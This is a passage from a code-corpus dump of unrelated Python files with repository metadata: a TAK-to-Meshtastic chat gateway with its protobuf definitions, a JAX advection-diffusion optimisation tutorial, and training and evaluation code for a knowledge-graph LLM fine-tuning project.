parser.add_argument('-s', '--serial-device', help='Serial device of the Meshtastic node', default=None)
parser.add_argument('-m', '--mesh-ip', help='IP address of the Meshtastic node', default=None)
parser.add_argument('-c', '--tak-client-ip', help='IP address of the TAK client', default="localhost")
parser.add_argument('-t', '--tx-interval', help='Minimum time to wait in seconds before sending PLI to the mesh',
default=30)
parser.add_argument('-l', '--log-file', help='Save log messages to the specified file', default=None)
parser.add_argument('-p', '--dm-socket-port', help='Port to listen on for DMs', default=4243)
parser.add_argument('-d', '--debug', help='Enable debug logging', action='store_true')
args = parser.parse_args()
if args.ip_address:
try:
ipaddress.IPv4Address(args.ip_address)
except ipaddress.AddressValueError:
print(f"Invalid IPv4 Address: {args.ip_address}")
sys.exit()
if args.mesh_ip:
try:
ipaddress.IPv4Address(args.mesh_ip)
except ipaddress.AddressValueError:
print(f"Invalid Mesh IPv4 Address: {args.mesh_ip}")
sys.exit()
if args.serial_device and args.mesh_ip:
print("Please specify either --serial-device or --mesh-ip, not both. If neither is specified this program will "
"try to automatically find the correct serial device.")
sys.exit()
tak_meshtastic_gateway = TAKMeshtasticGateway(args.ip_address, args.serial_device, args.mesh_ip, args.tak_client_ip,
args.tx_interval, args.dm_socket_port, args.log_file, args.debug)
tak_meshtastic_gateway.main()
if __name__ == '__main__':
main()
| 32,586 | Python | .py | 528 | 45.399621 | 156 | 0.558023 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,117 | __init__.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/__init__.py | # These version placeholders will be replaced later during substitution.
__version__ = "0.0.0-post.14+c0c6411"
__version_tuple__ = (0, 0, 0, "post", 14, "c0c6411")
| 164 | Python | .py | 3 | 53.666667 | 72 | 0.695652 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,118 | dm_socket_thread.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/dm_socket_thread.py | import socket
import takproto
from threading import Thread
from bs4 import BeautifulSoup
from meshtastic import portnums_pb2, atak_pb2
class DMSocketThread(Thread):
def __init__(self, logger, meshtastic_interface, port=4243):
super().__init__()
self.meshtastic_interface = meshtastic_interface
self.shutdown = False
self.socket = None
self.port = port
self.logger = logger
self.connection = None
self.connection_address = None
self.meshtastic_nodes = []
def run(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(('0.0.0.0', self.port))
self.socket.listen(1)
self.socket.settimeout(1.0)
while not self.shutdown:
try:
self.connection, self.connection_address = self.socket.accept()
self.logger.info(f"Got a connection from {self.connection_address[0]}")
except KeyboardInterrupt:
break
except TimeoutError:
if self.shutdown:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
continue
except BaseException as e:
self.logger.warning(e)
continue
try:
data = self.connection.recv(4096)
self.logger.debug(data)
self.connection.close()
except (ConnectionError, ConnectionResetError) as e:
self.logger.warning(e)
break
except TimeoutError:
if self.shutdown:
self.logger.warning("Got TimeoutError, exiting...")
break
else:
continue
parsed_data = takproto.parse_proto(data)
if not parsed_data:
parsed_data = takproto.parse_proto(takproto.xml2proto(data.decode('utf-8')))
if not parsed_data:
self.logger.warning(f"Failed to parse data: {data}")
continue
xml = "<details>" + parsed_data.cotEvent.detail.xmlDetail + "</details>"
details = BeautifulSoup(xml, 'xml')
remarks = details.find('remarks')
chat = details.find("__chat")
chatgrp = details.find("chatgrp")
# For some unknown reason, WinTAK can send a GeoChat CoT without a <remarks> tag
if not remarks or not chat or not chatgrp:
continue
self.logger.debug(f"Sending message: {remarks.text} to {chat.attrs['id']}")
# DM to a node with the Meshtastic app
if chat.attrs['id'] in self.meshtastic_nodes:
self.meshtastic_interface.sendText(text=remarks.text, destinationId=chat.attrs['id'])
# DM to a node running the ATAK plugin
else:
tak_packet = atak_pb2.TAKPacket()
tak_packet.contact.callsign = chat.attrs['senderCallsign']
tak_packet.contact.device_callsign = chatgrp.attrs['uid0']
tak_packet.chat.message = remarks.text
tak_packet.chat.to = chat.attrs['id']
self.meshtastic_interface.sendData(tak_packet, portNum=portnums_pb2.PortNum.ATAK_PLUGIN)
self.logger.debug(tak_packet)
def add_meshtastic_node(self, node_id):
if node_id not in self.meshtastic_nodes:
self.logger.debug(f"Adding {node_id}")
self.meshtastic_nodes.append(node_id)
def stop(self):
self.logger.warning("Shutting down")
self.shutdown = True
| 3,758 | Python | .py | 83 | 32.337349 | 104 | 0.583333 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,119 | atak_pb2.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/proto/atak_pb2.py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: atak.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\natak.proto\x12\nmeshtastic\"\xe6\x01\n\tTAKPacket\x12\x15\n\ris_compressed\x18\x01 \x01(\x08\x12$\n\x07\x63ontact\x18\x02 \x01(\x0b\x32\x13.meshtastic.Contact\x12 \n\x05group\x18\x03 \x01(\x0b\x32\x11.meshtastic.Group\x12\"\n\x06status\x18\x04 \x01(\x0b\x32\x12.meshtastic.Status\x12\x1e\n\x03pli\x18\x05 \x01(\x0b\x32\x0f.meshtastic.PLIH\x00\x12#\n\x04\x63hat\x18\x06 \x01(\x0b\x32\x13.meshtastic.GeoChatH\x00\x42\x11\n\x0fpayload_variant\"2\n\x07GeoChat\x12\x0f\n\x07message\x18\x01 \x01(\x0c\x12\x0f\n\x02to\x18\x02 \x01(\x0cH\x00\x88\x01\x01\x42\x05\n\x03_to\"M\n\x05Group\x12$\n\x04role\x18\x01 \x01(\x0e\x32\x16.meshtastic.MemberRole\x12\x1e\n\x04team\x18\x02 \x01(\x0e\x32\x10.meshtastic.Team\"\x19\n\x06Status\x12\x0f\n\x07\x62\x61ttery\x18\x01 \x01(\r\"4\n\x07\x43ontact\x12\x10\n\x08\x63\x61llsign\x18\x01 \x01(\x0c\x12\x17\n\x0f\x64\x65vice_callsign\x18\x02 \x01(\x0c\"_\n\x03PLI\x12\x12\n\nlatitude_i\x18\x01 \x01(\x0f\x12\x13\n\x0blongitude_i\x18\x02 \x01(\x0f\x12\x10\n\x08\x61ltitude\x18\x03 \x01(\x05\x12\r\n\x05speed\x18\x04 \x01(\r\x12\x0e\n\x06\x63ourse\x18\x05 \x01(\r*\xc0\x01\n\x04Team\x12\x14\n\x10Unspecifed_Color\x10\x00\x12\t\n\x05White\x10\x01\x12\n\n\x06Yellow\x10\x02\x12\n\n\x06Orange\x10\x03\x12\x0b\n\x07Magenta\x10\x04\x12\x07\n\x03Red\x10\x05\x12\n\n\x06Maroon\x10\x06\x12\n\n\x06Purple\x10\x07\x12\r\n\tDark_Blue\x10\x08\x12\x08\n\x04\x42lue\x10\t\x12\x08\n\x04\x43yan\x10\n\x12\x08\n\x04Teal\x10\x0b\x12\t\n\x05Green\x10\x0c\x12\x0e\n\nDark_Green\x10\r\x12\t\n\x05\x42rown\x10\x0e*\x7f\n\nMemberRole\x12\x0e\n\nUnspecifed\x10\x00\x12\x0e\n\nTeamMember\x10\x01\x12\x0c\n\x08TeamLead\x10\x02\x12\x06\n\x02HQ\x10\x03\x12\n\n\x06Sniper\x10\x04\x12\t\n\x05Medic\x10\x05\x12\x13\n\x0f\x46orwardObserver\x10\x06\x12\x07\n\x03RTO\x10\x07\x12\x06\n\x02K9\x10\x08\x42_\n\x13\x63om.geeksville.meshB\nATAKProtosZ\"github.com/meshtastic/go/generated\xaa\x02\x14Meshtastic.Protobufs\xba\x02\x00\x62\x06proto3')
_TEAM = DESCRIPTOR.enum_types_by_name['Team']
Team = enum_type_wrapper.EnumTypeWrapper(_TEAM)
_MEMBERROLE = DESCRIPTOR.enum_types_by_name['MemberRole']
MemberRole = enum_type_wrapper.EnumTypeWrapper(_MEMBERROLE)
Unspecifed_Color = 0
White = 1
Yellow = 2
Orange = 3
Magenta = 4
Red = 5
Maroon = 6
Purple = 7
Dark_Blue = 8
Blue = 9
Cyan = 10
Teal = 11
Green = 12
Dark_Green = 13
Brown = 14
Unspecifed = 0
TeamMember = 1
TeamLead = 2
HQ = 3
Sniper = 4
Medic = 5
ForwardObserver = 6
RTO = 7
K9 = 8
_TAKPACKET = DESCRIPTOR.message_types_by_name['TAKPacket']
_GEOCHAT = DESCRIPTOR.message_types_by_name['GeoChat']
_GROUP = DESCRIPTOR.message_types_by_name['Group']
_STATUS = DESCRIPTOR.message_types_by_name['Status']
_CONTACT = DESCRIPTOR.message_types_by_name['Contact']
_PLI = DESCRIPTOR.message_types_by_name['PLI']
TAKPacket = _reflection.GeneratedProtocolMessageType('TAKPacket', (_message.Message,), {
'DESCRIPTOR' : _TAKPACKET,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.TAKPacket)
})
_sym_db.RegisterMessage(TAKPacket)
GeoChat = _reflection.GeneratedProtocolMessageType('GeoChat', (_message.Message,), {
'DESCRIPTOR' : _GEOCHAT,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.GeoChat)
})
_sym_db.RegisterMessage(GeoChat)
Group = _reflection.GeneratedProtocolMessageType('Group', (_message.Message,), {
'DESCRIPTOR' : _GROUP,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.Group)
})
_sym_db.RegisterMessage(Group)
Status = _reflection.GeneratedProtocolMessageType('Status', (_message.Message,), {
'DESCRIPTOR' : _STATUS,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.Status)
})
_sym_db.RegisterMessage(Status)
Contact = _reflection.GeneratedProtocolMessageType('Contact', (_message.Message,), {
'DESCRIPTOR' : _CONTACT,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.Contact)
})
_sym_db.RegisterMessage(Contact)
PLI = _reflection.GeneratedProtocolMessageType('PLI', (_message.Message,), {
'DESCRIPTOR' : _PLI,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.PLI)
})
_sym_db.RegisterMessage(PLI)
if _descriptor._USE_C_DESCRIPTORS == False:
DESCRIPTOR._options = None
DESCRIPTOR._serialized_options = b'\n\023com.geeksville.meshB\nATAKProtosZ\"github.com/meshtastic/go/generated\252\002\024Meshtastic.Protobufs\272\002\000'
_TEAM._serialized_start=569
_TEAM._serialized_end=761
_MEMBERROLE._serialized_start=763
_MEMBERROLE._serialized_end=890
_TAKPACKET._serialized_start=27
_TAKPACKET._serialized_end=257
_GEOCHAT._serialized_start=259
_GEOCHAT._serialized_end=309
_GROUP._serialized_start=311
_GROUP._serialized_end=388
_STATUS._serialized_start=390
_STATUS._serialized_end=415
_CONTACT._serialized_start=417
_CONTACT._serialized_end=469
_PLI._serialized_start=471
_PLI._serialized_end=566
# @@protoc_insertion_point(module_scope)
| 5,562 | Python | .py | 103 | 52.038835 | 1,996 | 0.759735 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,120 | advection_diffusion.py | pmocz_advectiondiffusion-jax/advection_diffusion.py | import numpy as np
from scipy.sparse import csc_matrix
from scipy.sparse.linalg import splu
from scipy.optimize import minimize
import jax
#jax.config.update("jax_enable_x64", True) # turn this on to use double precision JAX
import jax.numpy as jnp
from jax import jit
from jaxopt import ScipyBoundedMinimize
from jax.experimental import sparse
import matplotlib.pyplot as plt
import timeit
"""
Create Your Own Automatically Differentiable Simulation (With Python/JAX)
Philip Mocz (2024), @PMocz
Solve the advection-diffusion equation using a finite difference method
Plug it into an optimization problem to find the wind parameters that maximize pollution at the center of the domain
Use either 'L-BFGS-B' method with finite difference gradient estimates (Numpy/SciPy) or autodiff (JAX) to solve the optimization problem
"""
# Global variables
W = 0.5
diffusivity = 0.05
t_end = 0.25
N = 61
M = 50
dx = 1.0 / (N-1)
dt = t_end / M
t = np.linspace(0, t_end, M+1)
# === Numpy version of the simulation ========================================
def index_function(i, j, N):
# maps index (i,j) to the vector index in our solution vector
# (the grid size is N^2)
return j*N + i
def initial_condition(x, y):
# initial condition for the pollution
return 2.0*np.exp(-100.0*((x-0.25)**2+(y-0.25)**2))+np.exp(-150.0*((x-0.65)**2+(y-0.4)**2))
def build_matrix(theta):
# Construct the matrix (D) and its LU decomposition for the linear system to be solved at each time step
D = np.eye(N**2, N**2)
for i in range(1, N-1):
for j in range(1, N-1):
D[index_function(i,j,N),index_function(i,j,N)] = dt*(1.0/dt + 4.0*diffusivity/dx**2)
D[index_function(i,j,N),index_function(i+1,j,N)] = dt*( W*np.cos(theta)/(2.0*dx) - diffusivity/dx**2)
D[index_function(i,j,N),index_function(i-1,j,N)] = dt*(-W*np.cos(theta)/(2.0*dx) - diffusivity/dx**2)
D[index_function(i,j,N),index_function(i,j+1,N)] = dt*( W*np.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D[index_function(i,j,N),index_function(i,j-1,N)] = dt*(-W*np.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D = csc_matrix(D) # sparse representation of the matrix
B = splu(D) # do an LU decomposition of the matrix
return B
def do_simulation(x):
# Solve the advection-diffusion equation using a finite difference method
# Keep track of the pollution
# Construct initial (t=0) solution
xlin = np.linspace(0.0, 1.0, N)
U = np.zeros(N**2)
for i in range(1, N-1):
for j in range(1, N-1):
U[index_function(i,j,N)] = initial_condition(xlin[i], xlin[j])
# Keep track of pollution as function of time
pollution = np.zeros(M+1)
ctr = index_function(N//2+1,N//2+1,N)
pollution[0] = U[ctr]
# Set the initial wind direction
update_wind_direction = False
i_wind = 0
# Build the initial matrix
B = build_matrix(x[i_wind])
# Solve for the time evolution
for i in range(M):
# update the wind direction every 5 time steps
update_wind_direction = (i>0 and i % 5 == 0)
if(update_wind_direction):
i_wind += 1
B = build_matrix(x[i_wind])
# solve the system
U = B.solve(U)
# record pollution at center of domain
pollution[i+1] = U[ctr]
pollution[M] = U[ctr]
pollution_total = np.trapz(pollution, t)
return U, pollution, pollution_total
def loss(x, info):
# loss function that wraps the simulation
_, _, pollution_total = do_simulation(x)
# display information at each function evaluation
print('{0:4d} {1: 3.4f} {2: 3.4f} {3: 3.4f} {4: 3.4f} {5: 3.4f} {6: 3.4f} {7: 3.4f} {8: 3.4f} {9: 3.4f} {10: 3.4f} {6: 3.6f}'.format(info['Nfeval'], x[0], x[1], x[2], x[3], x[4], x[5], x[6], x[7], x[8], x[9], pollution_total))
info['Nfeval'] += 1
return -pollution_total
# === JAX version of the simulation ==========================================
@jit
def initial_condition_jax(x, y):
# initial condition for the pollution -- JAX version
return 2.0*jnp.exp(-100.0*((x-0.25)**2+(y-0.25)**2))+jnp.exp(-150.0*((x-0.65)**2+(y-0.4)**2))
@jit
def do_simulation_jax(x):
# Solve the advection-diffusion equation with finite difference -- JAX version
# Keep track of the pollution
# Construct initial (t=0) solution
xlin = jnp.linspace(0.0, 1.0, N)
X, Y = jnp.meshgrid(xlin, xlin)
U = initial_condition_jax(X, Y)
U = U.at[0,:].set(0.0)
U = U.at[-1,:].set(0.0)
U = U.at[:,0].set(0.0)
U = U.at[:,-1].set(0.0)
U = U.flatten()
# Keep track of pollution as function of time
ctr = (N//2+1)*N + N//2+1
pollution = jnp.zeros(M+1)
pollution = pollution.at[0].set(U[ctr])
# Define boundary indices
bndry1 = jnp.arange(N)
bndry2 = (N-1)*N + jnp.arange(N)
bndry3 = jnp.arange(N)*N
bndry4 = jnp.arange(N)*N + N-1
bndry = jnp.concatenate((bndry1, bndry2, bndry3, bndry4))
# Set the initial wind direction
update_wind_direction = False
i_wind = 0
theta = x[i_wind]
# Construct the matrix (D) and its LU decomposition for the linear system to be solved at each time step
main_diag = jnp.ones(N**2) * dt*(1.0/dt + 4.0*diffusivity/dx**2)
off_diag1 = jnp.ones(N**2-1) * dt*( W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag2 = jnp.ones(N**2-1) * dt*(-W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag3 = jnp.ones(N**2-N) * dt*( W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag4 = jnp.ones(N**2-N) * dt*(-W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D = jnp.diag(main_diag) + jnp.diag(off_diag1, 1) + jnp.diag(off_diag2, -1) + jnp.diag(off_diag3, N) + jnp.diag(off_diag4, -N)
D = D.at[bndry, :].set(0.0)
D = D.at[bndry, bndry].set(1.0)
D = sparse.BCOO.fromdense(D, nse=5*N*N)
# Note: JAX does not support LU decomposition of sparse matrices, so we use a CG solver (an iterative method) instead
#B = jax.scipy.linalg.lu_factor(D) # do an LU decomposition of the matrix
# Solve for the time evolution
for i in range(M):
# update the wind direction every 5 time steps
update_wind_direction = (i>0 and i % 5 == 0)
if(update_wind_direction):
i_wind += 1
theta = x[i_wind]
off_diag1 = jnp.ones(N**2-1) * dt*( W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag2 = jnp.ones(N**2-1) * dt*(-W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag3 = jnp.ones(N**2-N) * dt*( W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag4 = jnp.ones(N**2-N) * dt*(-W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D = jnp.diag(main_diag) + jnp.diag(off_diag1, 1) + jnp.diag(off_diag2, -1) + jnp.diag(off_diag3, N) + jnp.diag(off_diag4, -N)
D = D.at[bndry, :].set(0.0)
D = D.at[bndry, bndry].set(1.0)
D = sparse.BCOO.fromdense(D, nse=5*N*N)
#B = jax.scipy.linalg.lu_factor(D) # do an LU decomposition of the matrix
# solve the system
#U = jax.scipy.linalg.lu_solve(B, U)
U, _ = jax.scipy.sparse.linalg.cg(D, U, x0=U, tol=1e-8)
# record pollution at center of domain
pollution = pollution.at[i+1].set(U[ctr])
pollution = pollution.at[M].set(U[ctr])
t = jnp.linspace(0, t_end, M+1)
pollution_total = jnp.trapezoid(pollution, t)
return U, pollution, pollution_total
@jit
def loss_jax(x):
# loss function that wraps the simulation
_, _, pollution_total = do_simulation_jax(x)
return -pollution_total
# === Main ==================================================================
def main():
# Wind parameters (initial guess)
x0 = [np.pi/2.0] * 10
bounds = [(0.0, np.pi)] * 10
# Optimize the wind parameters to find which values maximize the pollution
print("=== Numpy Approach =======================================================")
start = timeit.default_timer()
sol = minimize(loss, x0, args=({'Nfeval':0},), method='L-BFGS-B', tol=1e-8, bounds=bounds, options={'disp': True} )
print("Optimization process took:", timeit.default_timer() - start, "seconds")
print('Number of iterations:', sol.nit)
print('Optimized wind parameters:', '\033[1m', sol.x, '\033[0m')
# Re-run the simulation with the optimized parameters and print the level of pollution
start = timeit.default_timer()
U, pollution, pollution_total = do_simulation(sol.x)
print("Single simulation eval took:", timeit.default_timer() - start, "seconds")
print('Total pollution:', pollution_total)
# Carry out simulation with the optimized parameters
print("=== JAX Approach =========================================================")
#sim_grad = jax.grad(loss_jax) # compute the gradient of the loss function
start = timeit.default_timer()
jbounds = [[0.0]*10, [np.pi]*10]
optimizer = ScipyBoundedMinimize(fun=loss_jax, method='L-BFGS-B', tol = 1e-8, options={'disp': True})
sol_jax = optimizer.run(init_params=x0, bounds=jbounds)
print("Optimization process took:", timeit.default_timer() - start, "seconds")
print('Number of iterations:', sol_jax.state.iter_num)
print('Optimized wind parameters:', '\033[1m', np.array(sol_jax.params), '\033[0m')
# Re-run the simulation with the optimized parameters and print the level of pollution
start = timeit.default_timer()
U, pollution, pollution_total = do_simulation_jax(sol_jax.params)
print("Single simulation eval took:", timeit.default_timer() - start, "seconds")
print('Total pollution:', pollution_total)
# Plot the pollution as a function of time
fig = plt.figure(figsize=(4,4), dpi=120)
plt.plot(t, pollution, 'b-')
plt.xlabel('Time')
plt.ylabel('Pollution')
plt.xlim(0, t_end)
plt.ylim(0.0, 0.16)
plt.show()
# Plot the solution of the 2D pollution field
fig = plt.figure(figsize=(4,4), dpi=120)
U_plot = np.zeros((N, N))
for i in range(N):
for j in range(N):
U_plot[j, i] = U[index_function(i, j, N)]
plt.imshow(U_plot, cmap='Purples')
plt.clim(0.0, 0.4)
plt.contour(U_plot, levels=10, colors='black', alpha=0.5)
plt.plot(0.5*N, 0.5*N, 'bs', markersize=8)
ax = plt.gca()
ax.invert_yaxis()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax.set_aspect('equal')
# Save figure
plt.savefig('simulation.png',dpi=240)
plt.show()
return 0
if __name__== "__main__":
main()
| 10,142 | Python | .py | 223 | 42 | 238 | 0.649461 | pmocz/advectiondiffusion-jax | 8 | 3 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,121 | arguments.py | nju-websoft_DIFT/arguments.py | import os
import json
from typing import List, Optional, Dict, Sequence
from dataclasses import dataclass, field
from transformers import Seq2SeqTrainingArguments
@dataclass
class ModelArguments:
model_class: str = field(
default='KGELlama',
metadata={"help": "LlamaForCausalLM | KGELlama"}
)
model_name_or_path: Optional[str] = field(
default="llama-2-7b-chat-hf",
metadata={"help": "The directory in which LLM saved"}
)
kge_model: Optional[str] = field(
default="CoLE",
metadata={"help": "which pretrained embeddings to use"}
)
embedding_dim: int = field(default=768, metadata={'help': 'embedding dim for kge model'})
@dataclass
class DataArguments:
dataset: str = field(default=None, metadata={"help": "Which dataset to finetune on."})
train_path: str = field(default=None, metadata={"help": "path for train file."})
eval_path: str = field(default=None, metadata={"help": "path for valid file."})
test_path: str = field(default=None, metadata={"help": "path for test file."})
source_max_len: int = field(default=2048, metadata={"help": "Maximum source sequence length."},)
target_max_len: int = field(default=64, metadata={"help": "Maximum target sequence length."},)
@dataclass
class TrainingArguments(Seq2SeqTrainingArguments):
full_finetune: bool = field(default=False, metadata={"help": "Finetune the entire model without adapters."})
use_quant: bool = field(default=False, metadata={"help": "Finetune the entire model without adapters."})
double_quant: bool = field(default=True, metadata={"help": "Compress the quantization statistics through double quantization."})
quant_type: str = field(default="nf4",metadata={"help": "Quantization data type to use. Should be one of `fp4` or `nf4`."})
bits: int = field(default=4, metadata={"help": "How many bits to use."})
do_train: bool = field(default=True, metadata={"help": 'To train or not to train, that is the question?'})
do_eval: bool = field(default=True, metadata={"help": 'To train or not to train, that is the question?'})
output_dir: str = field(default='./output', metadata={"help": 'The output dir for logs and checkpoints'})
num_train_epochs: float = field(default=3.0, metadata={"help": "total epochs"})
per_device_train_batch_size: int = field(default=1, metadata={"help": 'The training batch size per GPU. Increase for better speed.'})
gradient_accumulation_steps: int = field(default=16, metadata={"help": 'How many gradients to accumulate before to perform an optimizer step'})
dataloader_num_workers: int = field(default=8)
optim: str = field(default='paged_adamw_32bit', metadata={"help": 'The optimizer to be used, default adamw_torch'})
learning_rate: float = field(default=0.0002, metadata={"help": 'The learnign rate'})
lr_scheduler_type: str = field(default='constant', metadata={"help": 'constant | linear | cosine'})
warmup_ratio: float = field(default=0.03, metadata={"help": 'Fraction of steps to do a warmup for'})
lora_r: int = field(default=64, metadata={"help": "Lora R dimension."})
lora_alpha: float = field(default=16, metadata={"help": " Lora alpha."})
lora_dropout: float = field(default=0.0, metadata={"help":"Lora dropout."})
report_to: str = field(default='none', metadata={'help': "do not use any loggers"})
remove_unused_columns: bool = field(default=False, metadata={"help": 'Removed unused columns. Needed to make this codebase work.'})
@dataclass
class EvaluationArguments:
checkpoint_dir: Optional[str] = field(default=None)
full_finetune: bool = field(default=False, metadata={"help": "Finetune the entire model without adapters."})
@dataclass
class GenerationArguments:
# control the length of the output
max_new_tokens: Optional[int] = field(default=64)
min_new_tokens : Optional[int] = field(default=1)
# Generation strategy
do_sample: Optional[bool] = field(default=True)
num_beams: Optional[int] = field(default=1)
num_beam_groups: Optional[int] = field(default=1)
penalty_alpha: Optional[float] = field(default=None)
use_cache: Optional[bool] = field(default=True)
# Hyperparameters for logit manipulation
temperature: Optional[float] = field(default=1.0)
top_k: Optional[int] = field(default=50)
top_p: Optional[float] = field(default=0.9)
typical_p: Optional[float] = field(default=1.0)
diversity_penalty: Optional[float] = field(default=0.0)
repetition_penalty: Optional[float] = field(default=1.0)
length_penalty: Optional[float] = field(default=1.0)
no_repeat_ngram_size: Optional[int] = field(default=0)
num_return_sequences: Optional[int] = field(default=1)
output_scores: Optional[bool] = field(default=False)
return_dict_in_generate: Optional[bool] = field(default=True)
| 4,907 | Python | .py | 78 | 57.820513 | 147 | 0.706742 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,122 | eval.py | nju-websoft_DIFT/eval.py | import os
import json
import copy
import numpy as np
from time import time
from tqdm import trange, tqdm
import argparse
import pickle as pkl
from typing import Union, Dict
import torch
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader
from transformers import (
HfArgumentParser, GenerationConfig, AutoConfig,
AutoTokenizer,
AutoModelForCausalLM, LlamaForCausalLM,
set_seed,
)
from peft.tuners.lora import LoraLayer
from peft import LoraConfig, get_peft_model, PeftModel, prepare_model_for_kbit_training
from arguments import ModelArguments, DataArguments, EvaluationArguments, GenerationArguments
from data import DataModule, KGDataset, KGDataCollator, IGNORE_INDEX
from utils import get_logger, print_parameter_datatypes, print_trainable_parameters
from model import EmbeddingModel, KGELlama
class Evaluator:
def __init__(
self,
args,
tokenizer: AutoTokenizer,
model: Union[AutoModelForCausalLM, PeftModel, KGELlama],
data_module: DataModule,
generation_config: GenerationConfig,
) -> None:
self.args = args
self.sample_size = 200
self.generation_config = generation_config
self.tokenizer = tokenizer
self.model = model
self.data_module = data_module
self.data_collator = KGDataCollator(args, tokenizer, args.source_max_len, args.target_max_len)
@torch.no_grad()
def eval_greedy(self, dataset: KGDataset):
# self.tokenizer.padding_side = 'left'
self.model.eval()
preds = []
raw_ranks = np.array([])
ranks = np.array([])
print_step = 1000
data_num = len(dataset)
for begin_idx in range(0, data_num, print_step):
end_idx = min(begin_idx + print_step, data_num)
generated = []
for ex_idx, ex in enumerate(tqdm(dataset[begin_idx: end_idx])):
prompt = ex['input']
if self.args.model_class == 'LlamaForCausalLM':
inputs = self.tokenizer(prompt, return_tensors='pt')
input_ids = inputs.input_ids.cuda() # (1, input_len)
input_len = input_ids.shape[-1]
output = self.model.generate(input_ids=input_ids, generation_config=self.generation_config)
generated.append(output.sequences[0, input_len:].cpu().numpy().tolist())
if self.args.model_class == 'KGELlama':
inputs = self.tokenizer(prompt, return_tensors='pt')
input_ids = inputs.input_ids.cuda() # (1, input_len)
output = self.model.generate(
input_ids=input_ids,
query_ids=torch.LongTensor([ex['query_id']]).to(input_ids.device),
entity_ids=torch.LongTensor([ex['entity_ids']]).to(input_ids.device),
generation_config=self.generation_config,
)
generated.append(output.sequences[0].cpu().numpy().tolist())
ex.pop('input')
batch_preds = self.tokenizer.batch_decode(generated, skip_special_tokens=True)
for ex_idx, ex in enumerate(dataset[begin_idx: end_idx]):
target = ex.pop('output')
rank = ex['rank']
pred = str(batch_preds[ex_idx]).strip()
topk_names = ex['topk_names']
if target == pred:
rank = 1
else:
if pred not in set(topk_names) or topk_names.index(pred) >= rank:
rank += 1
ex['target'] = target
ex['pred_rank'] = rank
ex['pred'] = pred
preds.append(ex)
raw_ranks = np.append(raw_ranks, ex['rank'])
ranks = np.append(ranks, rank)
def compute_metrics(ranks_: np.ndarray):
metrics = {
'hits1': np.mean(ranks_ <= 1),
'hits3': np.mean(ranks_ <= 3),
'hits10': np.mean(ranks_ <= 10),
'mrr': np.mean(1. / ranks_),
}
metrics = {k: round(v, 3) for k, v in metrics.items()}
logger.info(f'num: {ranks_.shape[0]}; {metrics}')
logger.info('='*80)
compute_metrics(raw_ranks)
compute_metrics(ranks)
return preds
if __name__ == '__main__':
set_seed(2023)
# load args
hfparser = HfArgumentParser((ModelArguments, DataArguments, EvaluationArguments, GenerationArguments))
model_args, data_args, eval_args, generation_args, _ = hfparser.parse_args_into_dataclasses(return_remaining_strings=True)
generation_config = GenerationConfig(**vars(generation_args))
args = argparse.Namespace(**vars(model_args), **vars(data_args), **vars(eval_args))
assert args.model_class in ['LlamaForCausalLM', 'KGELlama']
if args.kge_model == 'TransE':
args.embedding_dim = 100
# checkpoint_dir: .../checkpoint-xxxx/adapter_model
logger = get_logger(os.path.dirname(args.checkpoint_dir))
logger.info('args=>')
logger.info(json.dumps(vars(args), ensure_ascii=False, indent=4))
# tokenizer
tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=False)
tokenizer.pad_token = tokenizer.eos_token
if args.model_class == 'KGELlama':
tokenizer.add_tokens(['[QUERY]', '[ENTITY]', '[RELATION]'])
if args.model_class == 'LlamaForCausalLM':
model = LlamaForCausalLM.from_pretrained(args.model_name_or_path, low_cpu_mem_usage=True, device_map='auto')
model = PeftModel.from_pretrained(model, args.checkpoint_dir)
if args.model_class == 'KGELlama':
generation_config.bos_token_id = tokenizer.bos_token_id
